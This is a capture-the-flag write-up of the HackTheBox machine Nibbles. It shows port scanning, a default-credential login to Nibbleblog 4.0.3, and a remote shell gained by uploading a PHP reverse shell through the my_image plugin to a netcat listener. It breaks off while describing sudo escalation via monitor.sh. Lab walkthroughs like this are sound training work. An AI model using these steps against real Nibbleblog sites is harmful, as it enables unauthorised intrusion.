writeups · 1 min read
WriteUp – Nibbles (HackTheBox)
Write-up of Nibbles (HackTheBox): simple Linux machine that exploits Nibbleblog 4.0.3 with leaked credentials and RCE via plugin upload, and escalates to root by abusing sudo in the monitor.sh script.
· Manuel López Pérez · writeups
In this post we will resolve the machine Nibbles from HackTheBox It’s is a very simple Linux machine. My nick in HackTheBox is: manulqwerty If you have any proposal or correction do not hesitate to leave a comment.
WriteUp
Enumeration
As always, the first thing will be a port scan with Nmap:
nmap -sC -sV 10.10.10.75
Let’s take a look at the web. We’ll check the source code: 
Where we see:
/nibbleblog/ directory. Nothing interesting here!
So with no need to fuzz, we found:
That seems to be a nibbleblog. 
Let’s list the files and directorys of a nibbleblog: http://www.schizovivek.in/?dir=nibbleblog 
We find the Admin Panel on:
Exploitation
After a couple of tests we find the credentials:
admin:nibbles
As we see on Settings, the version is: Nibbleblog 4.0.3 “Coffee” We look for exploits for that version: https://curesec.com/blog/article/blog/NibbleBlog-403-Code-Execution-47.html or with metasploit: exploit/multi/http/nibbleblog_file_upload 
Get shell:
locate webshell cp /usr/share/webshells/php/php-reverse-shell.php . #We edit the ip php-reverse-shell.php nc -lvp 1234 #We upload the .php using the plugin my image of nibbleblog #Execute the php on: http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php
Post-Exploitation
We get tty shell: 
With sudo -l we see that we can execute the file: /home/nibbler/personal/stuff/monitor.sh as root with no passwd: 
